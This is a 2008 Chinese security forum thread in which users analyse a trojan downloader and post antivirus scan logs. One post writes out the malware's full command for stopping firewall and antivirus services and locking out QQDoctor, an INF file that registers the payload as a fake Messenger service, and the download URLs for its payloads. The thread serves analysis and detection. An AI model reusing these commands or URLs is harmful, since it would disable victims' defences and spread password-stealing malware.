FM94.8

显示全部楼层 · 发表于 2008-3-20 01:11:30

最终目的就是为了个质量低下的小批量，太让人失望了。

http://zy3653.com/xz/1.exe到http://zy3653.com/xz/*.exe

显示全部楼层 · 发表于 2008-3-20 01:24:32

其实这东西动作挺多的

下载：http://zy3653.com/xz/1.exe 到 http://zy3653.com/xz/20.exe
http://zy3653.com/xz/xxz.exe
改写IFEO，安装驱动恢复SSDT
尝试关闭服务，还对QQDoctor特殊照顾：
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled &net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"&cacls "C:\Program Files\Tencent\QQ\QQDoctor" /d everyone

注册生成物为服务
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=Messenger,,My_AddService_Name
[My_AddService_Name]
DisplayName=Messenger
Description=传输客户端和服务器之间的 NET SEND 和 Alerter 服务消息。此服务与 Windows Messenger 无关。如果服务停止，Alerter 消息不会被传输。如果服务被禁用，任何直接依赖于此服务的服务将无法启动。
ServiceType=0x10
StartType=2
ServiceBinary=%11%\Mess.exe
ErrorControl=0

等等

[ 本帖最后由 rappar 于 2008-3-20 01:29 编辑 ]

显示全部楼层 · 发表于 2008-3-20 01:35:24

现在ms像这样的东西动作都很多

显示全部楼层 · 发表于 2008-3-20 01:37:25

没想到还会有病毒看上QQ医生。。。。。。。

显示全部楼层 · 发表于 2008-3-20 06:07:24

Starting the file scan:

Begin scan in 'D:\2.exe'
D:\2.exe
   [DETECTION] Is the Trojan horse TR/PSW.Online.ddn.2
   [INFO]    The file was deleted!
Begin scan in 'D:\3.exe'
D:\3.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.tkm
   [INFO]    The file was deleted!
Begin scan in 'D:\4.exe'
D:\4.exe
   [DETECTION] Is the Trojan horse TR/PSW.Online.olm.2
   [INFO]    The file was deleted!
Begin scan in 'D:\5.exe'
D:\5.exe
   [DETECTION] Is the Trojan horse TR/Small.6910
   [INFO]    The file was deleted!
Begin scan in 'D:\6.exe'
D:\6.exe
   [DETECTION] Is the Trojan horse TR/PSW.Online.ddn.2
   [INFO]    The file was deleted!
Begin scan in 'D:\7.exe'
D:\7.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.tmj
   [INFO]    The file was deleted!
Begin scan in 'D:\8.exe'
D:\8.exe
   [DETECTION] Is the Trojan horse TR/PSW.Online.ddn.2
   [INFO]    The file was deleted!
Begin scan in 'D:\10.exe'
D:\10.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [INFO]    The file was deleted!
Begin scan in 'D:\14.exe'
D:\14.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [INFO]    The file was deleted!
Begin scan in 'D:\15.exe'
D:\15.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [INFO]    The file was deleted!
Begin scan in 'D:\16.exe'
D:\16.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [INFO]    The file was deleted!
Begin scan in 'D:\17.exe'
D:\17.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [INFO]    The file was deleted!
Begin scan in 'D:\18.exe'
D:\18.exe
   [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
   [INFO]    The file was deleted!
Begin scan in 'D:\xxz.exe'
D:\xxz.exe
   [DETECTION] Contains suspicious code HEUR/Malware
   [INFO]    The file was moved to '485b8f3a.qua'!
Begin scan in 'D:\1.exe'
D:\1.exe
   [DETECTION] Is the Trojan horse TR/PSW.Online.ddn.2
   [INFO]    The file was deleted!

End of the scan: 2008年3月20日  06:08
Used time: 00:09 min

The scan has been done completely.

   0 Scanning directories
   15 Files were scanned
   14 viruses and/or unwanted programs were found
   1 Files were classified as suspicious:
   14 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   1 Files not concerned
   0 Archives were scanned
   0 Warnings
   0 Notes

显示全部楼层 · 发表于 2008-3-20 08:23:23

显示全部楼层 · 发表于 2008-3-20 09:50:15

deleted: Trojan program Trojan-PSW.Win32.OnLineGames.tmj File: E:\ÏÂÔØ»ùµØ\virus\1.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.uir File: E:\ÏÂÔØ»ùµØ\virus\2.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.tkm File: E:\ÏÂÔØ»ùµØ\virus\3.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.uir File: E:\ÏÂÔØ»ùµØ\virus\8.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.rkf File: E:\ÏÂÔØ»ùµØ\virus\10.exe
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.tct File: E:\ÏÂÔØ»ùµØ\virus\14.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.rxps File: E:\ÏÂÔØ»ùµØ\virus\4.exe//PE_Patch//UPack
deleted: Trojan program Trojan.Win32.Pakes.bzp File: E:\ÏÂÔØ»ùµØ\virus\16.exe
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.rkf File: E:\ÏÂÔØ»ùµØ\virus\15.exe
deleted: Trojan program Trojan-PSW.Win32.Lmir.bpv File: E:\ÏÂÔØ»ùµØ\virus\18.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.tmj File: E:\ÏÂÔØ»ùµØ\virus\5.exe//PE_Patch//UPack
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.rkf File: E:\ÏÂÔØ»ùµØ\virus\17.exe
deleted: Trojan program Trojan-PSW.Win32.OnLineGames.tmj File: E:\ÏÂÔØ»ùµØ\virus\7.exe//PE_Patch//UPack

显示全部楼层 · 发表于 2008-3-20 10:05:04

QQ医生毕竟也是一个小小的弱弱的安全工具嘛，被病毒看上也是正常的，呵呵

显示全部楼层 · 发表于 2008-3-20 12:38:45

上google的黑名单了。

显示全部楼层 · 发表于 2008-3-20 12:50:03

病毒 2008-03-20  12:49:19 病毒在文件D:\Temporary Internet Files\Internet 临时文件\Content.IE5\FYAD7UGD\test[1].exe中 Win32.TrojDownloader.Agent.114688 处理成功（操作：删除）

信息 2008-03-20  12:49:38 您此次查毒隔离了1个文件
信息 2008-03-20  12:49:38 您此次查毒共查出1个病毒以及危险代码
信息 2008-03-20  12:49:38 您此次查毒共查了内存模块0个，磁盘引导扇区0个，文件3个
信息 2008-03-20  12:49:38 金山毒霸主程序查毒过程结束，查毒方式：命令行查毒
病毒 2008-03-20  12:49:38 D:\Desktop\test.cab\test.exe Win32.TrojDownloader.Small.114688 隔离成功

[已鉴定] FM94.8

回复 11楼 tanlimo 的帖子

回复 12楼 rappar 的帖子

回复 12楼 rappar 的帖子